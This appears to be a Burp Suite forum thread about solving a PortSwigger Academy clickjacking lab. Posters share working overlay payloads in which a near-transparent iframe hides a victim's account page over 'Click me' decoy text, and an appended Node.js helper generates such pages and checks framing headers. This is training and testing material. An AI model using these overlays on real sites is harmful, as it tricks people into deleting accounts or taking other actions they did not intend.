The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Basic clickjacking with CSRF token protection HELP

Pompom | Last updated: Jul 30, 2024 10:30PM UTC

I'm trying to solve this lab, but on the target website it directs to the login page instead of the account page with the delete button. How do I make my code redirect to the account page instead of the login page? I've already logged into the account on the real page using Burp's browser and copied the URL. Thank you.

    <style>
      /* near-transparent frame stacked above the decoy */
      iframe {
        position: relative;
        width: 1000px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
      }
      /* decoy text positioned under the target button */
      div {
        position: absolute;
        top: 600px;
        left: 60px;
        z-index: 1;
      }
    </style>
    <div>Click ME</div>
    <iframe src="https://0a2d00ca048872a08cdf606900550003.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 31, 2024 06:19AM UTC

I'm having the same challenge. I have done a screen recording and sent across. Waiting for further responses

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 01:17PM UTC

Hi both, have you tried using normal Chrome as an external browser proxied via Burp? If so, did this help? If it doesn't help, can you please let us know which version of Chrome you are using?

akibaRubi | Last updated: Jul 31, 2024 03:53PM UTC

Version 127.0.6533.89 (Official Build) (64-bit) Google Chrome Copyright 2024 Google LLC. All rights reserved. Chrome is made possible by the Chromium open source project and other open source software. Terms of Service

Michelle, PortSwigger Agent | Last updated: Aug 01, 2024 02:08PM UTC

Hi, thanks for confirming those details. I can see my colleague has replied to your email, and she was able to solve the lab using normal Chrome and the following exploit:

    <style>
      /* near-transparent frame stacked above the decoy */
      iframe {
        position: relative;
        width: 500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
      }
      /* decoy text positioned under the target button */
      div {
        position: absolute;
        top: 500px;
        left: 60px;
        z-index: 1;
      }
    </style>
    <div>Click me</div>
    <!-- use the full https:// URL: a bare host is resolved relative to the exploit server -->
    <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

I hope this helps.
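
The overlay page shown in the two posts above, as an added example (Node.js) that is not from this thread and not PortSwigger's code. It generates the page from parameters, rejects the bare-host mistake (a src without a scheme is a relative path and is fetched from the exploit server, not the lab), and adds the check a tester wants before building anything: whether the target's response headers (X-Frame-Options, CSP frame-ancestors) would let a browser frame it from the attacker origin at all. The hostnames are placeholders and the helper names (buildClickjackPage, framingAllowed, ancestorSourceMatches) are this example's own, not a lab or Burp API.

```javascript
// Added example, not from the thread or from PortSwigger. Hostnames are
// placeholders; the helper names are this example's own.

// Build the clickjacking page. The target must be an absolute URL: a bare
// host such as "lab.example/my-account" is a relative path and would be
// fetched from the exploit server instead of the lab, so it is rejected.
function buildClickjackPage({ target, decoy = "Click me", width = 500,
                              height = 700, top = 500, left = 60,
                              opacity = 0.0001 }) {
  const url = new URL(target); // throws TypeError on a relative string
  if (url.protocol !== "https:" && url.protocol !== "http:") {
    throw new Error(`unsupported scheme in target: ${url.protocol}`);
  }
  // The decoy text sits under the near-transparent frame (z-index 2 > 1), so
  // the victim's click lands on the genuine "Delete account" button. The
  // framed page is the real one, so it already carries a valid CSRF token.
  return [
    "<style>",
    `  iframe { position:relative; width:${width}px; height:${height}px;` +
      ` opacity:${opacity}; z-index:2; }`,
    `  div { position:absolute; top:${top}px; left:${left}px; z-index:1; }`,
    "</style>",
    `<div>${decoy}</div>`,
    `<iframe src="${url.href}"></iframe>`,
  ].join("\n");
}

// Does one CSP frame-ancestors source expression permit the framer origin?
// Ports are ignored to keep the matcher short.
function ancestorSourceMatches(src, framer, targetOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true;
  if (s === "'self'") return framer.origin === new URL(targetOrigin).origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s; // "https:"
  // host-source: [scheme://]host[:port][/path], host may begin with "*."
  let scheme = null, host = s;
  const i = s.indexOf("://");
  if (i !== -1) { scheme = s.slice(0, i + 1); host = s.slice(i + 3); }
  host = host.split("/")[0].split(":")[0];
  if (scheme && scheme !== framer.protocol) return false;
  if (host.startsWith("*.")) return framer.hostname.endsWith(host.slice(1));
  return framer.hostname === host;
}

// headers: object keyed by lower-cased header name, as Node's http module
// returns them. True means a browser would render targetOrigin inside a
// frame on framerOrigin; false means X-Frame-Options or frame-ancestors
// blocks it, and the clickjacking page above cannot work.
function framingAllowed(headers, targetOrigin, framerOrigin) {
  const framer = new URL(framerOrigin);
  const csp = headers["content-security-policy"] || "";
  const fa = /(?:^|;)\s*frame-ancestors\s+([^;]*)/i.exec(csp);
  if (fa) {
    // frame-ancestors wins: browsers that support it ignore X-Frame-Options
    const sources = fa[1].trim().split(/\s+/).filter(Boolean);
    return sources.some((src) => ancestorSourceMatches(src, framer, targetOrigin));
  }
  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framer.origin === new URL(targetOrigin).origin;
  return true; // no header, or a value browsers ignore (e.g. ALLOW-FROM)
}

if (typeof require !== "undefined" && require.main === module) {
  // Constructed sample: a lab-style target that sends no framing protection.
  const lab = "https://YOUR-LAB-ID.web-security-academy.net";
  const exploit = "https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net";
  console.log("frameable:", framingAllowed({}, lab, exploit));
  console.log(buildClickjackPage({ target: `${lab}/my-account` }));
}
```

Run framingAllowed against the headers of the lab's /my-account response before tuning offsets: if it returns false the page will render blank or be blocked regardless of the CSS, and the right next step is a different weakness, not more positioning tweaks.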

akibaRubi | Last updated: Aug 03, 2024 11:48AM UTC

okay, lab solved. Thanks

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 07:56AM UTC